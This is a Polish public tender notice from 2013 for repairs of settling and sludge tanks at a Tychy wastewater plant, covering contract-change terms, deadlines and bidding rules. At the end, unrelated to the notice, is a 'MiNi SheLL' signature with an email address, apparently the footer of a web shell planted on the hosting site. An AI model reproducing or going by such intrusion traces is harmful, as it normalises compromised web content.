<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Strony dopuszczają przedłużenie terminu umownego, jeżeli niedotrzymanie pierwotnego terminu umownego stanowi konsekwencję okoliczności, których nie można było wcześniej przewidzieć takich jak: 
a.konieczność realizacji robót dodatkowych nieobjętych zamówieniem podstawowym, których nie można było wcześniej przewidzieć, niezbędnych do prawidłowego wykonania niniejszej Umowy, których rozdzielenie od robót objętych Umową z przyczyn technicznych lub gospodarczych wymagałoby poniesienia niewspółmiernie wysokich kosztów lub wykonanie robót niniejszej Umowy jest uzależnione od wykonania robót dodatkowych; 
b.konieczność zapewnienia ciągłości pracy oczyszczalni; 
c.konieczność uzyskania uzgodnień, zgód i pozwoleń wydawanych przez organy zewnętrzne; 
d.działania siły wyższej takiej jak klęska żywiołowa, powódź, strajki generalne lub lokalne, lub innej mającej bezpośredni wpływ na terminowość wykonywanych robót. 
2.Zamawiający oprócz sytuacji przewidzianych w Umowie dopuszcza zmianę Umowy w następujących sytuacjach: 
a) wprowadzenia zmian nieistotnych do Umowy, 
b) zmiany przepisów powszechnie obowiązujących, 
c) wystąpienia sytuacji, której nie można było przewidzieć w momencie zawarcia umowy, a która ma wpływ na jakość i/lub termin realizacji Umowy w tym w szczególności:
i. sytuacje związane z postępem technicznym i/lub, 
ii. zmianami technologicznymi służącymi zmniejszeniu kosztów inwestycyjnych i/lub eksploatacyjnych obiektów i instalacji realizowanych w ramach niniejszej umowy i/lub, 
iii. zwiększeniu bezpieczeństwa realizowanych obiektów i instalacji i/lub d) rezygnacji na każdym etapie przez Zamawiającego z całości lub części przedmiotu zamówienia; 
e) wystąpienia siły wyższej w tym w szczególności następujące zdarzenia: działania wojenne, przewrót wojskowy lub cywilny, wojnę domową, klęski żywiołowe spowodowane przez: huragany, powodzie, pożary, strajki inne zdarzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rcgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Gospodarki Wodno-Ściekowej S.A., Al. M. Piłsudskiego 12, 43-100 Tychy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 10:00, miejsce: W siedzibie Zamawiającego (Regionalne Centrum Gospodarki Wodno-Ściekowej S.A., Al. M. Piłsudskiego 12, 43-100 Tychy), w pokoju 414.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający dopuszcza składanie ofert częściowych. 1) Dla Części 1 zamówienia na Remont osadnika wstępnego (10A), 2) Dla Części 2 zamówienia na Remont zbiornika osadu surowego (12) i zbiornika pompowni C-TECH (301). 2. Zamawiający nie dopuszcza składania ofert wariantowych. 
3. W części 1 zamówienia w zakresie wymiany uszkodzonej konstrukcji bieżni, Zamawiający umożliwia wykonanie w/w zakresu wariantowo (wyłącznie w zakresie wariantów A i B przewidzianych w pkt. III ust.2.1 lit. d) SIWZ). 
4. Zamawiający nie przewiduje zawarcia umowy ramowej. 
5. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej oraz ustanowienia dynamicznego systemu zakupów. 
6. Wszystkie rozliczenia związane z realizacją zamówienia publicznego, którego dotyczy niniejsza SIWZ dokonywane będą w PLN. 
7. Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części zamówienia podwykonawcom. W takim przypadku Wykonawca zobowiązany jest do wskazania w Ofercie (Załącznik nr 1) części zamówienia (zakresu), których wykonanie zamierza powierzyć podwykonawcom. 
8. Zamawiający w przedmiotowym postępowaniu nie prowadził dialogu technicznego. 
9. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. 
10.Nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej. 
11.Data zamieszczenia niniejszego ogłoszenia w Biuletynie Zamówień Publicznych: 26.07.2013r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com